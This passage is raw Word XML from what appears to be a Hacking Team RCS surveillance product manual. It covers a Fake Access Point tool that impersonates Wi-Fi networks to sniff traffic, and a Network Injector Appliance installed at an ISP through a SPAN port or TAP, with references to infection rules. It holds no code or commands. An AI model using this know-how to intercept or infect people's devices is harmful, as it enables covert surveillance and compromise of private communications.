          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireless Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4FF7" w:rsidRPr="00FA1D58" w:rsidRDefault="00EB4FF7" w:rsidP="00EB4FF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004520E9" w:rsidRDefault="004520E9">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92909" w:rsidRPr="004520E9" w:rsidRDefault="00D92909" w:rsidP="00D92909">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc372642507"/>
      <w:r w:rsidRPr="004520E9">
        <w:lastRenderedPageBreak/>
        <w:t>Fake Access Point Usage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00D92909" w:rsidRDefault="00D92909" w:rsidP="00D92909">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRDefault="0041409B" w:rsidP="0041409B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Fake Access Point allows to </w:t>
      </w:r>
      <w:r w:rsidR="00453C2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emulate a Wi-Fi access point and directly sniff the entire network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRDefault="0041409B" w:rsidP="0041409B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRDefault="0041409B" w:rsidP="0041409B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to make the </w:t>
      </w:r>
      <w:r w:rsidR="00387D23">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fake Access Point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool works, you’ve to specify:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRDefault="0041409B" w:rsidP="0041409B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRDefault="0041409B" w:rsidP="0041409B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireless interface: the wireless network card to use in order to </w:t>
      </w:r>
      <w:r w:rsidR="00387D23">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emulate a Wi-Fi access point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRDefault="00387D23" w:rsidP="0041409B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type of emulation</w:t>
      </w:r>
      <w:r w:rsidR="0041409B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you can choose to emulate existing Wi-Fi networks or to create a new one;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRDefault="0041409B" w:rsidP="0041409B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRDefault="00D8502A" w:rsidP="0041409B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6115050" cy="4581525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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rsidR="0041409B" w:rsidRPr="002D7F2D" w:rsidRDefault="0041409B" w:rsidP="0041409B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="0041409B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.10</w:t>
      </w:r>
      <w:r w:rsidR="0041409B" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="0041409B">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tactical Control Center</w:t>
      </w:r>
      <w:r w:rsidR="0041409B" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:r w:rsidR="0041409B">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fake Access Point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0041409B" w:rsidRPr="00FA1D58" w:rsidRDefault="0041409B" w:rsidP="0041409B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004520E9" w:rsidRDefault="004520E9">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E25B4" w:rsidRDefault="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="002E25B4" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId216"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C87FEC" w:rsidRDefault="00C87FEC" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc372642508"/>
      <w:r w:rsidRPr="00DA06EB">
        <w:lastRenderedPageBreak/>
        <w:t>Network Injector Appliance (NIA)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00272286" w:rsidRDefault="00272286" w:rsidP="00272286">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Network Injector </w:t>
      </w:r>
      <w:r w:rsidR="00761CA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Appliance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is an optional RCS component that must be installed by System Administrator role within the “System &gt; Network Injectors” section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761CA3" w:rsidRDefault="00761CA3" w:rsidP="00272286">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00761CA3" w:rsidRDefault="00A1162F" w:rsidP="00272286">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Its configuration within the RCS Console takes place in the same way of the Tactical Network Injector (see page 47), as well as the infection rules configuration (see pages 51-52-53-54-55).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E11F83" w:rsidRDefault="00E11F83" w:rsidP="00272286">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E11F83" w:rsidRDefault="00A34912" w:rsidP="00272286">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Due to the importance of the appliance and to the large number of variables that must be analyzed during the installation, Hacking Team always provides a preliminary technical support to understand, together with the client, if the installation can take place at the ISP selected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA7FD3" w:rsidRDefault="00FA7FD3" w:rsidP="00272286">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E25B4" w:rsidRDefault="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E25B4" w:rsidRPr="00930E7B" w:rsidRDefault="002E25B4" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc372642509"/>
      <w:r w:rsidRPr="00930E7B">
        <w:t>Connecting the Appliance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="002E25B4" w:rsidRDefault="002E25B4" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E25B4" w:rsidRDefault="00B55CFB" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55CFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Network Injector Appliance can be connected at ISP level through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 different ways: SPAN port or TAP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B55CFB" w:rsidRDefault="00B55CFB" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1413"/>
        <w:gridCol w:w="8215"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B55CFB" w:rsidTr="00592C5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13" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55CFB" w:rsidRDefault="00B55CFB" w:rsidP="00592C54">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8215" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55CFB" w:rsidRDefault="00B55CFB" w:rsidP="00592C54">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B55CFB" w:rsidTr="00592C5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B55CFB" w:rsidRDefault="00B55CFB" w:rsidP="00592C54">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SPAN Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8215" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55CFB" w:rsidRDefault="00B55CFB" w:rsidP="00592C54">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55CFB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This type of connection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is usually faster to implement, but has the following drawbacks:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B55CFB" w:rsidRDefault="00B55CFB" w:rsidP="00592C54">
            <w:pPr>
              <w:pStyle w:val="Paragrafoelenco"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55CFB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>switch CPU use may significantly increase due to port use</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B55CFB" w:rsidRPr="00B55CFB" w:rsidRDefault="00B55CFB" w:rsidP="00592C54">
            <w:pPr>
              <w:pStyle w:val="Paragrafoelenco"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55CFB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>the SPAN port on t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>he switch may already be in use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B55CFB" w:rsidTr="00592C54">
        <w:trPr>
          <w:trHeight w:val="1134"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55CFB" w:rsidRDefault="00B55CFB" w:rsidP="00592C54">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8215" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55CFB" w:rsidRDefault="00592C54" w:rsidP="00592C54">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00592C54">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A TAP device is often installed at the Internet service provider and is the most</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00592C54">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>appropriate solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00592C54">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for traffic monitoring.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B55CFB" w:rsidRDefault="00B55CFB" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>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236"/>
        <w:gridCol w:w="4577"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD0586" w:rsidTr="00E12326">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4815" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00BD0586" w:rsidRDefault="00E12326" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="4380" w:dyaOrig="1095">
                <v:shape id="_x0000_i1066" type="#_x0000_t75" style="width:219pt;height:54.75pt" o:ole="">
                  <v:imagedata r:id="rId217" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1066" DrawAspect="Content" ObjectID="_1446455281" r:id="rId218"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4577" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2381250" cy="838200"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="228" name="Immagine 228" descr="NetworkInstrument-n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03" descr="NetworkInstrument-nTa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tc>
      </w:tr>
      <w:tr w:rsidR="00BD0586" w:rsidTr="00E12326">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4815" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD0586" w:rsidRPr="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.1 SPAN Port (example)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4577" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD0586" w:rsidRPr="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="00BD0586">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.2 TAP (example)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BD0586" w:rsidRDefault="00BD0586" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F8278D" w:rsidRDefault="00F8278D" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRDefault="00F86DE5">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00F86DE5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3225600" cy="2520000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="223" name="Immagine 223" descr="http://www.networkinstruments.com/assets/img/pics/taps/t-vs-s-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93" descr="http://www.networkinstruments.com/assets/img/pics/taps/t-vs-s-span.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25600" cy="2520000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00F86DE5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRPr="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00F86DE5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRPr="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00F86DE5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F86DE5">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Most enterprise switches copy the activity of one or more ports through a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A60944">
